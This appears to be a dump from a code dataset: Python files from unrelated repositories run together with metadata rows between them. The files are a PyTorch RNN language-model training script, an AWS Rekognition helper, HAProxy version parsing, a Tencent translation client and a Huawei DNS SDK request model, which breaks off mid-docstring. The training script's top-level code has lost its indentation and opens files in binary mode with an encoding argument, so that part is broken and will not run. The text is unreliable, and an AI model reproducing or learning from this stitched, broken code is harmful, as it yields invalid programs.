            print(idx2word[correct_label], scores[correct_label])
            f_output.write("\t".join(str(s) for s in scores) + "\n")
    #return total_loss[0] /len(data_source)
###############################################################################
# Training code
###############################################################################
def train():
    """Run one epoch of training over the global `train_data`.

    Uses module-level globals: `model`, `train_data`, `args`, `ntokens`,
    `lr`, `epoch`.  Optimization is hand-rolled SGD (p -= lr * p.grad)
    with gradient-norm clipping; no torch.optim optimizer is used.
    """
    # Turn on training mode which enables dropout.
    model.train()
    total_loss = 0
    start_time = time.time()
    criterion = nn.CrossEntropyLoss()
    for batch, i in enumerate(range(0, train_data.size(0) - 1)):
        #> i is the starting index of the batch
        #> batch is the number of the batch
        #> data is a tensor of size seq_length x batch_size, where each element is an index from input vocabulary
        #> targets is a vector of length seq_length x batch_size
        data, targets = get_batch(train_data, i, args.bptt)
        # Fresh zeroed hidden state per window; no truncated-BPTT carryover.
        hidden = model.init_hidden(args.batch_size)
        model.zero_grad()
        output = model(data, hidden)
        #> output.view(-1, ntokens) transforms a tensor to a longer tensor of size
        #> (seq_length x batch_size) x output_vocab_size
        #> which matches targets in length
        loss = criterion(output.view(-1, ntokens), targets)
        loss.backward()
        # NOTE(review): clip_grad_norm (no trailing underscore) is the
        # deprecated spelling — fine on the old torch this targets.
        torch.nn.utils.clip_grad_norm(model.parameters(), args.clip)
        # Manual SGD parameter update.
        for p in model.parameters():
            p.data.add_(-lr, p.grad.data)
        total_loss += loss.data
        if batch % args.log_interval == 0 and batch > 0:
            cur_loss = total_loss[0] / args.log_interval
            elapsed = time.time() - start_time
            #logging.info('| epoch {:3d} | {:5d}/{:5d} batches | lr {:02.2f} | ms/batch {:5.2f} | '
            #             'loss {:5.2f} | ppl {:8.2f}'.format(
            #    epoch, batch, len(train_data) // args.bptt, lr,
            #    elapsed * 1000 / args.log_interval, cur_loss, math.exp(cur_loss)))
            logging.info('| epoch {:3d} | {:5d}/{:5d} batches | lr {:02.2f} | ms/batch {:5.2f} | '
                         'loss {:5.2f}'.format(epoch, batch, len(train_data), lr,
                                               elapsed * 1000 / args.log_interval, cur_loss))
            total_loss = 0
            start_time = time.time()
# Set the random seed manually for reproducibility.
torch.manual_seed(args.seed)
if torch.cuda.is_available():
if not args.cuda:
print("WARNING: You have a CUDA device, so you should probably run with --cuda")
else:
torch.cuda.manual_seed(args.seed)
###############################################################################
# Load data
###############################################################################
if args.train:
logging.info("Loading data")
corpus = Corpus(args.data)
# logging.info(corpus.train)
ntokens = len(corpus.dictionary)
logging.info("Vocab size %d", ntokens)
logging.info("Batchying..")
eval_batch_size = 256
train_data = batchify(corpus.train, args.batch_size, args.cuda)
# logging.info("Train data size", train_data.size())
val_data = batchify(corpus.valid, eval_batch_size, args.cuda)
test_data = batchify(corpus.test, eval_batch_size, args.cuda)
logging.info("Building the model")
# model = torch.nn.DataParallel(model.RNNModel(args.model, ntokens, args.emsize, args.nhid, args.nlayers, args.dropout, args.tied),
# dim=1)
model = RNNModel(args.model, ntokens, args.emsize, args.nhid, args.nlayers, args.dropout, args.tied)
if args.cuda:
model.cuda()
# Loop over epochs.
lr = args.lr
best_val_loss = None
try:
for epoch in range(1, args.epochs+1):
epoch_start_time = time.time()
train()
val_loss = evaluate_perplexity(val_data)
logging.info('-' * 89)
logging.info('| end of epoch {:3d} | time: {:5.2f}s | valid loss {:5.2f} | '
'valid ppl {:8.2f}'.format(epoch, (time.time() - epoch_start_time),
val_loss, math.exp(val_loss)))
logging.info('-' * 89)
# Save the model if the validation loss is the best we've seen so far.
if not best_val_loss or val_loss < best_val_loss:
with open(args.save, 'wb') as f:
torch.save(model, f)
best_val_loss = val_loss
else:
# Anneal the learning rate if no improvement has been seen in the validation dataset.
lr /= 4.0
except KeyboardInterrupt:
logging.info('-' * 89)
logging.info('Exiting from training early')
# Load the best saved model.
with open(args.save, 'rb', encoding="utf8") as f:
model = torch.load(f)
# Run on valid data with OOV excluded
test_loss = evaluate_perplexity(val_data, exclude_oov=True)
logging.info('=' * 89)
logging.info('| End of training | test loss {:5.2f} | test ppl {:8.2f}'.format(test_loss, math.exp(test_loss)))
logging.info('=' * 89)
#####################################
# Testing #
#####################################
if args.test:
dictionary = Dictionary(args.data)
with open(args.save, 'rb', encoding="utf8") as f:
print("Loading the model")
if args.cuda:
model = torch.load(f)
model.cuda()
else:
# to convert model trained on cuda to cpu model
model = torch.load(f, map_location=lambda storage, loc: storage)
model.cpu()
model.eval()
eval_batch_size = 1
ntokens = len(dictionary)
#print("Vocab size", ntokens)
#print("TESTING")
# depends on generation script (constantly modified) - the column where the target word index is written
index_col = 3
mask = create_target_mask(args.test_path + ".text", args.test_path + ".gold", index_col)
mask_data = batchify(torch.LongTensor(mask), eval_batch_size, False)
test_data = batchify(tokenize(dictionary, args.test_path + ".text"), eval_batch_size, args.cuda)
f_output = open(args.test_path + ".output_" + args.suffix, 'w')
evaluate_on_mask(test_data, mask_data)
f_output.close()
| 7,509 | 0 | 223 |
c27598268e1d0e6a50e5d396fd0a67b3c383e1b3 | 901 | py | Python | part7/pi/RekognitionApi.py | sofiaisha/johnnypi | e4bdeca9f1741c7d387557d907879633f2fbf8ed | [
"Apache-2.0"
] | null | null | null | part7/pi/RekognitionApi.py | sofiaisha/johnnypi | e4bdeca9f1741c7d387557d907879633f2fbf8ed | [
"Apache-2.0"
] | null | null | null | part7/pi/RekognitionApi.py | sofiaisha/johnnypi | e4bdeca9f1741c7d387557d907879633f2fbf8ed | [
"Apache-2.0"
] | null | null | null | import boto3
defaultRegion = 'eu-west-1'
defaultUrl = 'https://rekognition.'+defaultRegion+'.amazonaws.com'
defaultBucket = "jsimon-public"
| 42.904762 | 104 | 0.732519 | import boto3
# Default connection/bucket settings for the Rekognition helpers below.
defaultRegion = 'eu-west-1'
defaultUrl = 'https://rekognition.' + defaultRegion + '.amazonaws.com'
defaultBucket = "jsimon-public"

def connectToRekognition(regionName=defaultRegion, endpointUrl=defaultUrl):
    """Create an Amazon Rekognition client for the given region/endpoint."""
    return boto3.client('rekognition', region_name=regionName, endpoint_url=endpointUrl)

def detectFaces(rekognition, imageFilename, imageBucket=defaultBucket, attributes='ALL'):
    """Run DetectFaces on an S3-hosted image and return the FaceDetails list."""
    image_ref = {"S3Object": {'Bucket': imageBucket, 'Name': imageFilename}}
    response = rekognition.detect_faces(Image=image_ref, Attributes=[attributes])
    return response['FaceDetails']

def detectLabels(rekognition, imageFilename, imageBucket=defaultBucket, maxLabels=10, minConfidence=80):
    """Run DetectLabels on an S3-hosted image and return the Labels list."""
    image_ref = {"S3Object": {'Bucket': imageBucket, 'Name': imageFilename}}
    response = rekognition.detect_labels(Image=image_ref, MaxLabels=maxLabels, MinConfidence=minConfidence)
    return response['Labels']
| 691 | 0 | 69 |
660cbf8a629f9279a5e8400f39b722641b3bf4fa | 512 | py | Python | haproxy/datadog_checks/haproxy/legacy/version_utils.py | mchelen-gov/integrations-core | 81281600b3cc7025a7a32148c59620c9592a564f | [
"BSD-3-Clause"
] | 663 | 2016-08-23T05:23:45.000Z | 2022-03-29T00:37:23.000Z | haproxy/datadog_checks/haproxy/legacy/version_utils.py | mchelen-gov/integrations-core | 81281600b3cc7025a7a32148c59620c9592a564f | [
"BSD-3-Clause"
] | 6,642 | 2016-06-09T16:29:20.000Z | 2022-03-31T22:24:09.000Z | haproxy/datadog_checks/haproxy/legacy/version_utils.py | mchelen-gov/integrations-core | 81281600b3cc7025a7a32148c59620c9592a564f | [
"BSD-3-Clause"
] | 1,222 | 2017-01-27T15:51:38.000Z | 2022-03-31T18:17:51.000Z | # (C) Datadog, Inc. 2020-present
# All rights reserved
# Licensed under Simplified BSD License (see LICENSE)
import re
VERSION_PATTERN = re.compile(r"(?:HAProxy|hapee-lb) version ([^,]+)")
| 23.272727 | 69 | 0.646484 | # (C) Datadog, Inc. 2020-present
# All rights reserved
# Licensed under Simplified BSD License (see LICENSE)
import re
VERSION_PATTERN = re.compile(r"(?:HAProxy|hapee-lb) version ([^,]+)")

def get_version_from_http(raw_version):
    """Extract the version from an HAProxy/HAPEE HTTP status banner.

    Returns None when the payload is empty OR does not contain a version
    banner.  The original dereferenced `.group(1)` unconditionally, so a
    non-empty unrecognized payload raised AttributeError on the None match.
    """
    if raw_version == "":
        return None
    match = VERSION_PATTERN.search(raw_version)
    return match.group(1) if match else None
def get_version_from_socket(info):
    """Return the value of the 'Version' line from `show info` socket output.

    `info` is an iterable of 'Key: value' lines.  Uses partition(':') so a
    value that itself contains ':' no longer raises ValueError (the
    original unpacked an unbounded split into exactly two names).  Returns
    '' when no Version line is present.  The value keeps its leading
    space, matching the original behavior.
    """
    for line in info:
        key, _, value = line.partition(':')
        if key == 'Version':
            return value
    return ''
| 274 | 0 | 46 |
9246f3b991651372f43f7eb0a28fb084c553f61f | 2,960 | py | Python | frameworks/tencent_translate/entrypoint.py | OpenNMT/nmt-wizard-docker | a7f44297168fa0ac5159dbc7c9d49c1badaff7d5 | [
"MIT"
] | 44 | 2018-03-07T13:29:08.000Z | 2022-02-17T08:09:01.000Z | frameworks/tencent_translate/entrypoint.py | OpenNMT/nmt-wizard-docker | a7f44297168fa0ac5159dbc7c9d49c1badaff7d5 | [
"MIT"
] | 73 | 2018-03-07T11:06:38.000Z | 2022-01-06T14:31:31.000Z | frameworks/tencent_translate/entrypoint.py | OpenNMT/nmt-wizard-docker | a7f44297168fa0ac5159dbc7c9d49c1badaff7d5 | [
"MIT"
] | 20 | 2018-03-06T23:38:26.000Z | 2022-02-15T10:16:06.000Z | import os
import time
import hashlib
import hmac
import base64
import random
import sys
import binascii
import requests
import urllib.parse
from nmtwizard.cloud_translation_framework import CloudTranslationFramework
if __name__ == "__main__":
TencentTranslateFramework().run()
| 29.6 | 82 | 0.576351 | import os
import time
import hashlib
import hmac
import base64
import random
import sys
import binascii
import requests
import urllib.parse
from nmtwizard.cloud_translation_framework import CloudTranslationFramework
class TencentTranslateFramework(CloudTranslationFramework):
    """Translation backend using the Tencent Machine Translation (TMT) API.

    Credentials come from the TENCENT_SecretId / TENCENT_SecretKey
    environment variables; both are required.
    """
    def __init__(self):
        super(TencentTranslateFramework, self).__init__()
        self._appid = os.getenv("TENCENT_SecretId")
        self._key = os.getenv("TENCENT_SecretKey")
        if self._appid is None:
            raise ValueError("missing app id")
        if self._key is None:
            raise ValueError("missing key")
    def translate_batch(self, batch, source_lang, target_lang):
        """Yield the translation of each line of `batch` (generator)."""
        # Tencent API does not support translating multi lines in one request
        for line in batch:
            yield self._translate_line(line, source_lang, target_lang)
    def _translate_line(self, line, source_lang, target_lang):
        """Translate a single line via a signed TextTranslate GET request.

        The signature is computed over "GET<host>/?<urlencoded params>",
        so the order of `params` matters — it is kept in ascending key
        order.  Do not reorder or the server will reject the signature.
        """
        url = "tmt.na-siliconvalley.tencentcloudapi.com"
        signature_method = "HmacSHA256"
        params = [
            ("Action", "TextTranslate"),
            ("Nonce", random.randint(1, sys.maxsize)),
            ("ProjectId", 0),
            ("Region", "na-siliconvalley"),
            ("SecretId", self._appid),
            ("SignatureMethod", signature_method),
            ("Source", source_lang.lower()),
            ("SourceText", line),
            ("Target", target_lang.lower()),
            ("Timestamp", int(time.time())),
            ("Version", "2018-03-21"),
        ]
        # Sign the canonical request string, then attach the signature as
        # an extra query parameter.
        request = "GET%s/?%s" % (url, urllib.parse.urlencode(params))
        params.append(
            ("Signature", _sign_request(self._key, request, signature_method))
        )
        headers = {
            "content-type": "application/x-www-form-urlencoded",
            "accept": "application/json",
        }
        # send_request (from the base class) handles retries/errors.
        result = self.send_request(
            lambda: requests.get("https://" + url, params=params, headers=headers)
        )
        return result["Response"]["TargetText"]
    def supported_languages(self):
        """Return the ISO 639-1 codes this backend accepts."""
        return [
            "de",
            "en",
            "es",
            "fr",
            "id",
            "it",
            "ja",
            "ko",
            "ms",
            "pt",
            "ru",
            "th",
            "tr",
            "vi",
            "zh",
        ]
def _sign_request(secretKey, signStr, signMethod):
signStr = bytes(signStr, "utf-8")
secretKey = bytes(secretKey, "utf-8")
digestmod = None
if signMethod == "HmacSHA256":
digestmod = hashlib.sha256
elif signMethod == "HmacSHA1":
digestmod = hashlib.sha1
else:
raise NotImplementedError(
"signMethod invalid", "signMethod only support (HmacSHA1, HmacSHA256)"
)
hashed = hmac.new(secretKey, signStr, digestmod)
return binascii.b2a_base64(hashed.digest())[:-1].decode()
if __name__ == "__main__":
TencentTranslateFramework().run()
| 2,483 | 38 | 153 |
2ab023dd348797c93d60e6e16feda87daf60e9b5 | 13,858 | py | Python | huaweicloud-sdk-dns/huaweicloudsdkdns/v2/model/list_record_sets_with_line_request.py | wuchen-huawei/huaweicloud-sdk-python-v3 | 3683d703f4320edb2b8516f36f16d485cff08fc2 | [
"Apache-2.0"
] | 1 | 2021-11-03T07:54:50.000Z | 2021-11-03T07:54:50.000Z | huaweicloud-sdk-dns/huaweicloudsdkdns/v2/model/list_record_sets_with_line_request.py | wuchen-huawei/huaweicloud-sdk-python-v3 | 3683d703f4320edb2b8516f36f16d485cff08fc2 | [
"Apache-2.0"
] | null | null | null | huaweicloud-sdk-dns/huaweicloudsdkdns/v2/model/list_record_sets_with_line_request.py | wuchen-huawei/huaweicloud-sdk-python-v3 | 3683d703f4320edb2b8516f36f16d485cff08fc2 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
import pprint
import re
import six
class ListRecordSetsWithLineRequest:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'zone_type': 'str',
'marker': 'str',
'limit': 'str',
'offset': 'str',
'line_id': 'str',
'tags': 'str',
'status': 'str',
'type': 'str',
'name': 'str',
'id': 'str',
'records': 'str',
'sort_key': 'str',
'sort_dir': 'str',
'health_check_id': 'str',
'search_mode': 'str'
}
attribute_map = {
'zone_type': 'zone_type',
'marker': 'marker',
'limit': 'limit',
'offset': 'offset',
'line_id': 'line_id',
'tags': 'tags',
'status': 'status',
'type': 'type',
'name': 'name',
'id': 'id',
'records': 'records',
'sort_key': 'sort_key',
'sort_dir': 'sort_dir',
'health_check_id': 'health_check_id',
'search_mode': 'search_mode'
}
def __init__(self, zone_type=None, marker=None, limit=None, offset=None, line_id=None, tags=None, status=None, type=None, name=None, id=None, records=None, sort_key=None, sort_dir=None, health_check_id=None, search_mode=None):
"""ListRecordSetsWithLineRequest - a model defined in huaweicloud sdk"""
self._zone_type = None
self._marker = None
self._limit = None
self._offset = None
self._line_id = None
self._tags = None
self._status = None
self._type = None
self._name = None
self._id = None
self._records = None
self._sort_key = None
self._sort_dir = None
self._health_check_id = None
self._search_mode = None
self.discriminator = None
if zone_type is not None:
self.zone_type = zone_type
if marker is not None:
self.marker = marker
if limit is not None:
self.limit = limit
if offset is not None:
self.offset = offset
if line_id is not None:
self.line_id = line_id
if tags is not None:
self.tags = tags
if status is not None:
self.status = status
if type is not None:
self.type = type
if name is not None:
self.name = name
if id is not None:
self.id = id
if records is not None:
self.records = records
if sort_key is not None:
self.sort_key = sort_key
if sort_dir is not None:
self.sort_dir = sort_dir
if health_check_id is not None:
self.health_check_id = health_check_id
if search_mode is not None:
self.search_mode = search_mode
@property
def zone_type(self):
"""Gets the zone_type of this ListRecordSetsWithLineRequest.
待查询的Record Set的域名类型。 取值范围:public 搜索模式默认为模糊搜索。 默认值为public。
:return: The zone_type of this ListRecordSetsWithLineRequest.
:rtype: str
"""
return self._zone_type
@zone_type.setter
def zone_type(self, zone_type):
"""Sets the zone_type of this ListRecordSetsWithLineRequest.
待查询的Record Set的域名类型。 取值范围:public 搜索模式默认为模糊搜索。 默认值为public。
:param zone_type: The zone_type of this ListRecordSetsWithLineRequest.
:type: str
"""
self._zone_type = zone_type
@property
def marker(self):
"""Gets the marker of this ListRecordSetsWithLineRequest.
分页查询起始的资源ID,为空时为查询第一页。 默认值为空。
:return: The marker of this ListRecordSetsWithLineRequest.
:rtype: str
"""
return self._marker
@marker.setter
def marker(self, marker):
"""Sets the marker of this ListRecordSetsWithLineRequest.
分页查询起始的资源ID,为空时为查询第一页。 默认值为空。
:param marker: The marker of this ListRecordSetsWithLineRequest.
:type: str
"""
self._marker = marker
@property
def limit(self):
"""Gets the limit of this ListRecordSetsWithLineRequest.
每页返回的资源个数。 取值范围:0~500 取值一般为10,20,50。默认值为500。
:return: The limit of this ListRecordSetsWithLineRequest.
:rtype: str
"""
return self._limit
@limit.setter
def limit(self, limit):
"""Sets the limit of this ListRecordSetsWithLineRequest.
每页返回的资源个数。 取值范围:0~500 取值一般为10,20,50。默认值为500。
:param limit: The limit of this ListRecordSetsWithLineRequest.
:type: str
"""
self._limit = limit
@property
def offset(self):
"""Gets the offset of this ListRecordSetsWithLineRequest.
分页查询起始偏移量,表示从偏移量的下一个资源开始查询。 取值范围:0~2147483647 默认值为0。 当前设置marker不为空时,以marker为分页起始标识。
:return: The offset of this ListRecordSetsWithLineRequest.
:rtype: str
"""
return self._offset
@offset.setter
def offset(self, offset):
"""Sets the offset of this ListRecordSetsWithLineRequest.
分页查询起始偏移量,表示从偏移量的下一个资源开始查询。 取值范围:0~2147483647 默认值为0。 当前设置marker不为空时,以marker为分页起始标识。
:param offset: The offset of this ListRecordSetsWithLineRequest.
:type: str
"""
self._offset = offset
@property
def line_id(self):
"""Gets the line_id of this ListRecordSetsWithLineRequest.
解析线路ID。
:return: The line_id of this ListRecordSetsWithLineRequest.
:rtype: str
"""
return self._line_id
@line_id.setter
def line_id(self, line_id):
"""Sets the line_id of this ListRecordSetsWithLineRequest.
解析线路ID。
:param line_id: The line_id of this ListRecordSetsWithLineRequest.
:type: str
"""
self._line_id = line_id
@property
def tags(self):
"""Gets the tags of this ListRecordSetsWithLineRequest.
资源标签。 取值格式:key1,value1|key2,value2 多个标签之间用\"|\"分开,每个标签的键值用英文逗号\",\"相隔。
:return: The tags of this ListRecordSetsWithLineRequest.
:rtype: str
"""
return self._tags
@tags.setter
def tags(self, tags):
"""Sets the tags of this ListRecordSetsWithLineRequest.
资源标签。 取值格式:key1,value1|key2,value2 多个标签之间用\"|\"分开,每个标签的键值用英文逗号\",\"相隔。
:param tags: The tags of this ListRecordSetsWithLineRequest.
:type: str
"""
self._tags = tags
@property
def status(self):
"""Gets the status of this ListRecordSetsWithLineRequest.
待查询的Record Set的状态。 取值范围:ACTIVE、ERROR、DISABLE、FREEZE、PENDING_CREATE、PENDING_UPDATE、PENDING_DELETE
:return: The status of this ListRecordSetsWithLineRequest.
:rtype: str
"""
return self._status
@status.setter
def status(self, status):
"""Sets the status of this ListRecordSetsWithLineRequest.
待查询的Record Set的状态。 取值范围:ACTIVE、ERROR、DISABLE、FREEZE、PENDING_CREATE、PENDING_UPDATE、PENDING_DELETE
:param status: The status of this ListRecordSetsWithLineRequest.
:type: str
"""
self._status = status
@property
def type(self):
"""Gets the type of this ListRecordSetsWithLineRequest.
待查询的Record Set的记录集类型。 取值范围:A、CNAME、MX、AAAA、TXT、SRV、NS、CAA
:return: The type of this ListRecordSetsWithLineRequest.
:rtype: str
"""
return self._type
@type.setter
def type(self, type):
"""Sets the type of this ListRecordSetsWithLineRequest.
待查询的Record Set的记录集类型。 取值范围:A、CNAME、MX、AAAA、TXT、SRV、NS、CAA
:param type: The type of this ListRecordSetsWithLineRequest.
:type: str
"""
self._type = type
@property
def name(self):
"""Gets the name of this ListRecordSetsWithLineRequest.
待查询的Record Set的域名中包含此name。 搜索模式默认为模糊搜索。 默认值为空。
:return: The name of this ListRecordSetsWithLineRequest.
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this ListRecordSetsWithLineRequest.
待查询的Record Set的域名中包含此name。 搜索模式默认为模糊搜索。 默认值为空。
:param name: The name of this ListRecordSetsWithLineRequest.
:type: str
"""
self._name = name
@property
def id(self):
"""Gets the id of this ListRecordSetsWithLineRequest.
待查询的Record Set的id包含此id。 搜索模式默认为模糊搜索。 默认值为空。
:return: The id of this ListRecordSetsWithLineRequest.
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this ListRecordSetsWithLineRequest.
待查询的Record Set的id包含此id。 搜索模式默认为模糊搜索。 默认值为空。
:param id: The id of this ListRecordSetsWithLineRequest.
:type: str
"""
self._id = id
@property
def records(self):
"""Gets the records of this ListRecordSetsWithLineRequest.
待查询的Record Set的值中包含此records。 搜索模式默认为模糊搜索。 默认值为空。
:return: The records of this ListRecordSetsWithLineRequest.
:rtype: str
"""
return self._records
@records.setter
def records(self, records):
"""Sets the records of this ListRecordSetsWithLineRequest.
待查询的Record Set的值中包含此records。 搜索模式默认为模糊搜索。 默认值为空。
:param records: The records of this ListRecordSetsWithLineRequest.
:type: str
"""
self._records = records
@property
def sort_key(self):
"""Gets the sort_key of this ListRecordSetsWithLineRequest.
查询结果中Record Set列表的排序字段。 取值范围: name:域名 type:记录集类型 默认值为空,表示不排序。
:return: The sort_key of this ListRecordSetsWithLineRequest.
:rtype: str
"""
return self._sort_key
@sort_key.setter
def sort_key(self, sort_key):
"""Sets the sort_key of this ListRecordSetsWithLineRequest.
查询结果中Record Set列表的排序字段。 取值范围: name:域名 type:记录集类型 默认值为空,表示不排序。
:param sort_key: The sort_key of this ListRecordSetsWithLineRequest.
:type: str
"""
self._sort_key = sort_key
@property
def sort_dir(self):
"""Gets the sort_dir of this ListRecordSetsWithLineRequest.
查询结果中Record Set列表的排序方式。 取值范围: desc:降序排序 asc:升序排序 默认值为空,表示不排序。
:return: The sort_dir of this ListRecordSetsWithLineRequest.
:rtype: str
"""
return self._sort_dir
@sort_dir.setter
def sort_dir(self, sort_dir):
"""Sets the sort_dir of this ListRecordSetsWithLineRequest.
查询结果中Record Set列表的排序方式。 取值范围: desc:降序排序 asc:升序排序 默认值为空,表示不排序。
:param sort_dir: The sort_dir of this ListRecordSetsWithLineRequest.
:type: str
"""
self._sort_dir = sort_dir
@property
def health_check_id(self):
"""Gets the health_check_id of this ListRecordSetsWithLineRequest.
健康检查ID。 搜索模式默认为模糊搜索。 默认值为空。
:return: The health_check_id of this ListRecordSetsWithLineRequest.
:rtype: str
"""
return self._health_check_id
@health_check_id.setter
def health_check_id(self, health_check_id):
"""Sets the health_check_id of this ListRecordSetsWithLineRequest.
健康检查ID。 搜索模式默认为模糊搜索。 默认值为空。
:param health_check_id: The health_check_id of this ListRecordSetsWithLineRequest.
:type: str
"""
self._health_check_id = health_check_id
@property
def search_mode(self):
"""Gets the search_mode of this ListRecordSetsWithLineRequest.
查询条件搜索模式。 取值范围: like:模糊搜索 equal:精确搜索 默认值为like。
:return: The search_mode of this ListRecordSetsWithLineRequest.
:rtype: str
"""
return self._search_mode
@search_mode.setter
def search_mode(self, search_mode):
"""Sets the search_mode of this ListRecordSetsWithLineRequest.
查询条件搜索模式。 取值范围: like:模糊搜索 equal:精确搜索 默认值为like。
:param search_mode: The search_mode of this ListRecordSetsWithLineRequest.
:type: str
"""
self._search_mode = search_mode
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ListRecordSetsWithLineRequest):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 28.339468 | 230 | 0.603262 | # coding: utf-8
import pprint
import re
import six
class ListRecordSetsWithLineRequest:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'zone_type': 'str',
'marker': 'str',
'limit': 'str',
'offset': 'str',
'line_id': 'str',
'tags': 'str',
'status': 'str',
'type': 'str',
'name': 'str',
'id': 'str',
'records': 'str',
'sort_key': 'str',
'sort_dir': 'str',
'health_check_id': 'str',
'search_mode': 'str'
}
attribute_map = {
'zone_type': 'zone_type',
'marker': 'marker',
'limit': 'limit',
'offset': 'offset',
'line_id': 'line_id',
'tags': 'tags',
'status': 'status',
'type': 'type',
'name': 'name',
'id': 'id',
'records': 'records',
'sort_key': 'sort_key',
'sort_dir': 'sort_dir',
'health_check_id': 'health_check_id',
'search_mode': 'search_mode'
}
def __init__(self, zone_type=None, marker=None, limit=None, offset=None, line_id=None, tags=None, status=None, type=None, name=None, id=None, records=None, sort_key=None, sort_dir=None, health_check_id=None, search_mode=None):
"""ListRecordSetsWithLineRequest - a model defined in huaweicloud sdk"""
self._zone_type = None
self._marker = None
self._limit = None
self._offset = None
self._line_id = None
self._tags = None
self._status = None
self._type = None
self._name = None
self._id = None
self._records = None
self._sort_key = None
self._sort_dir = None
self._health_check_id = None
self._search_mode = None
self.discriminator = None
if zone_type is not None:
self.zone_type = zone_type
if marker is not None:
self.marker = marker
if limit is not None:
self.limit = limit
if offset is not None:
self.offset = offset
if line_id is not None:
self.line_id = line_id
if tags is not None:
self.tags = tags
if status is not None:
self.status = status
if type is not None:
self.type = type
if name is not None:
self.name = name
if id is not None:
self.id = id
if records is not None:
self.records = records
if sort_key is not None:
self.sort_key = sort_key
if sort_dir is not None:
self.sort_dir = sort_dir
if health_check_id is not None:
self.health_check_id = health_check_id
if search_mode is not None:
self.search_mode = search_mode
@property
def zone_type(self):
"""Gets the zone_type of this ListRecordSetsWithLineRequest.
待查询的Record Set的域名类型。 取值范围:public 搜索模式默认为模糊搜索。 默认值为public。
:return: The zone_type of this ListRecordSetsWithLineRequest.
:rtype: str
"""
return self._zone_type
@zone_type.setter
def zone_type(self, zone_type):
"""Sets the zone_type of this ListRecordSetsWithLineRequest.
待查询的Record Set的域名类型。 取值范围:public 搜索模式默认为模糊搜索。 默认值为public。
:param zone_type: The zone_type of this ListRecordSetsWithLineRequest.
:type: str
"""
self._zone_type = zone_type
@property
def marker(self):
"""Gets the marker of this ListRecordSetsWithLineRequest.
分页查询起始的资源ID,为空时为查询第一页。 默认值为空。
:return: The marker of this ListRecordSetsWithLineRequest.
:rtype: str
"""
return self._marker
@marker.setter
def marker(self, marker):
"""Sets the marker of this ListRecordSetsWithLineRequest.
分页查询起始的资源ID,为空时为查询第一页。 默认值为空。
:param marker: The marker of this ListRecordSetsWithLineRequest.
:type: str
"""
self._marker = marker
@property
def limit(self):
"""Gets the limit of this ListRecordSetsWithLineRequest.
每页返回的资源个数。 取值范围:0~500 取值一般为10,20,50。默认值为500。
:return: The limit of this ListRecordSetsWithLineRequest.
:rtype: str
"""
return self._limit
@limit.setter
def limit(self, limit):
"""Sets the limit of this ListRecordSetsWithLineRequest.
每页返回的资源个数。 取值范围:0~500 取值一般为10,20,50。默认值为500。
:param limit: The limit of this ListRecordSetsWithLineRequest.
:type: str
"""
self._limit = limit
@property
def offset(self):
"""Gets the offset of this ListRecordSetsWithLineRequest.
分页查询起始偏移量,表示从偏移量的下一个资源开始查询。 取值范围:0~2147483647 默认值为0。 当前设置marker不为空时,以marker为分页起始标识。
:return: The offset of this ListRecordSetsWithLineRequest.
:rtype: str
"""
return self._offset
@offset.setter
def offset(self, offset):
"""Sets the offset of this ListRecordSetsWithLineRequest.
分页查询起始偏移量,表示从偏移量的下一个资源开始查询。 取值范围:0~2147483647 默认值为0。 当前设置marker不为空时,以marker为分页起始标识。
:param offset: The offset of this ListRecordSetsWithLineRequest.
:type: str
"""
self._offset = offset
@property
def line_id(self):
"""Gets the line_id of this ListRecordSetsWithLineRequest.
解析线路ID。
:return: The line_id of this ListRecordSetsWithLineRequest.
:rtype: str
"""
return self._line_id
@line_id.setter
def line_id(self, line_id):
"""Sets the line_id of this ListRecordSetsWithLineRequest.
解析线路ID。
:param line_id: The line_id of this ListRecordSetsWithLineRequest.
:type: str
"""
self._line_id = line_id
@property
def tags(self):
"""Gets the tags of this ListRecordSetsWithLineRequest.
资源标签。 取值格式:key1,value1|key2,value2 多个标签之间用\"|\"分开,每个标签的键值用英文逗号\",\"相隔。
:return: The tags of this ListRecordSetsWithLineRequest.
:rtype: str
"""
return self._tags
@tags.setter
def tags(self, tags):
"""Sets the tags of this ListRecordSetsWithLineRequest.
资源标签。 取值格式:key1,value1|key2,value2 多个标签之间用\"|\"分开,每个标签的键值用英文逗号\",\"相隔。
:param tags: The tags of this ListRecordSetsWithLineRequest.
:type: str
"""
self._tags = tags
@property
def status(self):
"""Gets the status of this ListRecordSetsWithLineRequest.
待查询的Record Set的状态。 取值范围:ACTIVE、ERROR、DISABLE、FREEZE、PENDING_CREATE、PENDING_UPDATE、PENDING_DELETE
:return: The status of this ListRecordSetsWithLineRequest.
:rtype: str
"""
return self._status
@status.setter
def status(self, status):
"""Sets the status of this ListRecordSetsWithLineRequest.
待查询的Record Set的状态。 取值范围:ACTIVE、ERROR、DISABLE、FREEZE、PENDING_CREATE、PENDING_UPDATE、PENDING_DELETE
:param status: The status of this ListRecordSetsWithLineRequest.
:type: str
"""
self._status = status
@property
def type(self):
"""Gets the type of this ListRecordSetsWithLineRequest.
待查询的Record Set的记录集类型。 取值范围:A、CNAME、MX、AAAA、TXT、SRV、NS、CAA
:return: The type of this ListRecordSetsWithLineRequest.
:rtype: str
"""
return self._type
@type.setter
def type(self, type):
"""Sets the type of this ListRecordSetsWithLineRequest.
